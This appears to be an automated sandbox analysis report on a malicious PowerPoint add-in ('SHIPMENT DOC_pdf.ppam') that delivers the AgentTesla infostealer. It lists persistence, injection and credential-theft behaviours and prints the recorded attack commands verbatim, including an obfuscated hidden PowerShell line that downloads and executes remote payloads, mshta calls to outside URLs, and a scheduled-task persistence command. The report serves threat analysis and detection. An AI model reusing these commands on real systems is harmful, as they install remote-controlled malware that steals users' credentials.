Analysis
-
max time kernel
127s -
max time network
135s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
19-10-2021 05:41
Static task
static1
Behavioral task
behavioral1
Sample
SHIPMENT DOC_pdf.ppam
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
SHIPMENT DOC_pdf.ppam
Resource
win10-en-20211014
General
-
Target
SHIPMENT DOC_pdf.ppam
-
Size
8KB
-
MD5
e49c885d3236afa32adef83e8a201573
-
SHA1
f8e63da458adee3ece85529ddeba477a07087430
-
SHA256
6f931b139cdf0652432a133e3beef1ff6136571c8d953f3eee28316bbf9c5674
-
SHA512
7339c4c43193686e737c6c4dbfcaf7778195e2c51d057436426651c1a62375196f393b69e6abcffa1ca2fc75c4117fb719b5b51b3eb4bd4335c85a8d08f0e3ff
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 4404 3504 mshta.exe POWERPNT.EXE -
AgentTesla Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/2276-334-0x000000000043751E-mapping.dmp family_agenttesla behavioral2/memory/536-403-0x000000000043751E-mapping.dmp family_agenttesla -
Blocklisted process makes network request 15 IoCs
Processes:
mshta.exepowershell.exeflow pid process 29 4404 mshta.exe 31 4404 mshta.exe 33 4404 mshta.exe 35 4404 mshta.exe 37 4404 mshta.exe 39 4404 mshta.exe 43 4404 mshta.exe 45 4404 mshta.exe 47 4404 mshta.exe 50 4404 mshta.exe 51 4404 mshta.exe 52 4404 mshta.exe 53 4404 mshta.exe 55 4404 mshta.exe 57 4732 powershell.exe -
Drops file in Drivers directory 2 IoCs
Processes:
jsc.exeRegAsm.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts jsc.exe File opened for modification C:\Windows\system32\drivers\etc\hosts RegAsm.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
RegAsm.exejsc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/12.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/12.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/12.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_e7293c57732f4f278d939202241e0b25.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_cf83a79c40724f5c8e18bb53de0f0399.txt').GetResponse().GetResponseStream()).ReadToend());" mshta.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exedescription pid process target process PID 4732 set thread context of 2276 4732 powershell.exe jsc.exe PID 4732 set thread context of 536 4732 powershell.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
POWERPNT.EXEmshta.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mshta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mshta.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 4948 taskkill.exe 2372 taskkill.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 3504 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exedw20.exejsc.exeRegAsm.exepid process 4732 powershell.exe 4732 powershell.exe 2160 dw20.exe 2160 dw20.exe 4732 powershell.exe 2276 jsc.exe 2276 jsc.exe 536 RegAsm.exe 536 RegAsm.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
RegAsm.exepid process 536 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 4948 taskkill.exe Token: SeDebugPrivilege 2372 taskkill.exe Token: SeDebugPrivilege 4732 powershell.exe Token: SeDebugPrivilege 2276 jsc.exe Token: SeDebugPrivilege 536 RegAsm.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
POWERPNT.EXEpid process 3504 POWERPNT.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
POWERPNT.EXEmshta.exeRegAsm.exejsc.exepid process 3504 POWERPNT.EXE 3504 POWERPNT.EXE 3504 POWERPNT.EXE 4404 mshta.exe 536 RegAsm.exe 2276 jsc.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
POWERPNT.EXEmshta.exepowershell.execsc.exedescription pid process target process PID 3504 wrote to memory of 4404 3504 POWERPNT.EXE mshta.exe PID 3504 wrote to memory of 4404 3504 POWERPNT.EXE mshta.exe PID 4404 wrote to memory of 4948 4404 mshta.exe taskkill.exe PID 4404 wrote to memory of 4948 4404 mshta.exe taskkill.exe PID 4404 wrote to memory of 2372 4404 mshta.exe taskkill.exe PID 4404 wrote to memory of 2372 4404 mshta.exe taskkill.exe PID 4404 wrote to memory of 4732 4404 mshta.exe powershell.exe PID 4404 wrote to memory of 4732 4404 mshta.exe powershell.exe PID 4404 wrote to memory of 1344 4404 mshta.exe schtasks.exe PID 4404 wrote to memory of 1344 4404 mshta.exe schtasks.exe PID 4404 wrote to memory of 2160 4404 mshta.exe dw20.exe PID 4404 wrote to memory of 2160 4404 mshta.exe dw20.exe PID 4732 wrote to memory of 2276 4732 powershell.exe jsc.exe PID 4732 wrote to memory of 2276 4732 powershell.exe jsc.exe PID 4732 wrote to memory of 2276 4732 powershell.exe jsc.exe PID 4732 wrote to memory of 2276 4732 powershell.exe jsc.exe PID 4732 wrote to memory of 2276 4732 powershell.exe jsc.exe PID 4732 wrote to memory of 2276 4732 powershell.exe jsc.exe PID 4732 wrote to memory of 2276 4732 powershell.exe jsc.exe PID 4732 wrote to memory of 2276 4732 powershell.exe jsc.exe PID 4732 wrote to memory of 4720 4732 powershell.exe csc.exe PID 4732 wrote to memory of 4720 4732 powershell.exe csc.exe PID 4720 wrote to memory of 4640 4720 csc.exe cvtres.exe PID 4720 wrote to memory of 4640 4720 csc.exe cvtres.exe PID 4732 wrote to memory of 536 4732 powershell.exe RegAsm.exe PID 4732 wrote to memory of 536 4732 powershell.exe RegAsm.exe PID 4732 wrote to memory of 536 4732 powershell.exe RegAsm.exe PID 4732 wrote to memory of 536 4732 powershell.exe RegAsm.exe PID 4732 wrote to memory of 536 4732 powershell.exe RegAsm.exe PID 4732 wrote to memory of 536 4732 powershell.exe RegAsm.exe PID 4732 wrote to memory of 536 4732 powershell.exe RegAsm.exe PID 4732 wrote to memory of 536 4732 powershell.exe RegAsm.exe -
outlook_office_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
outlook_win_path 1 IoCs
Processes:
jsc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\SHIPMENT DOC_pdf.ppam" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://www.bitly.com/ajdwwdwdwdmlrufhjwijjd2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4948 -
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2372 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/12.html\""3⤵
- Creates scheduled task(s)
PID:1344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_e7293c57732f4f278d939202241e0b25.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_cf83a79c40724f5c8e18bb53de0f0399.txt').GetResponse().GetResponseStream()).ReadToend());3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_win_path
PID:2276 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qxmfby5g\qxmfby5g.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES39B9.tmp" "c:\Users\Admin\AppData\Local\Temp\qxmfby5g\CSCF07E4FBF968B4B609785B2BC5720E0D2.TMP"5⤵PID:4640
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
PID:536 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 8123⤵
- Suspicious behavior: EnumeratesProcesses
PID:2160
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
68d5f70975dcf58f1e3eb8e8cd9b8424
SHA1561835ef57f326cfecff5bfad9fa471df0d759dd
SHA2564cae5b8683e34bd7829ec70e1bf067800972b6b8651ef0d678e3db8f3307a85c
SHA512b39422cfb28108e62f2e1be146dc4713f2d5aca49ad10faebf5844650665c2cbeb19ad7db5c3d9713915db6015f48e9cbdb40faeb4398f42cd070763737c094c
-
MD5
d98eae14e70cf736456f64ef449cea10
SHA1be1b00401e3732b2987f80f5d3961a9444450077
SHA25631065da5521e16c1b010675cea237ad79141e96a2284d3b2f99cf1d0ddbbaac3
SHA51230f0a0c1bf610e569e89ed94101bd46948b35be3113f984935fc4f501be1042809c33d8db10d6bbb572785593095e23ebc0575d2bbd931ebc1f9b1ca2cdc3174
-
MD5
2db7a644c347d4d34c2020d2e25ecc72
SHA1af5500dffc2a21fdd7450995a0f8306f4c6edfbb
SHA25613fdf7f9a9d9ec793f62279a5c4bf632f587e58750f0e6845850508724747a1f
SHA512a1e67071ea1ee7c707594d351790c2dae2aed06426b729846d2a20cebfb870ba16c75d7cdfd51126db6b62726fb9b244daf142edd73eb72c014a0919b39a57f6
-
MD5
e03b1e7ba7f1a53a7e10c0fd9049f437
SHA13bb851a42717eeb588eb7deadfcd04c571c15f41
SHA2563ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427
SHA512a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f
-
MD5
e7160c105a42a7ae8ef72fc4b953e1b0
SHA12751288d8c3ae6eadcfa9de44eb9403d8e3d0031
SHA256d915530999de28b9d17763155584ee09828827804eb98d6bb0c2ed68db47c1d1
SHA5127a14f5f7f99b4242abe179816a972cabbe88f7a0761909ca21a3b9501361822097459363e685bc053ef1a490cfb345a289dc02f633e764e8e25cd3d0342e2893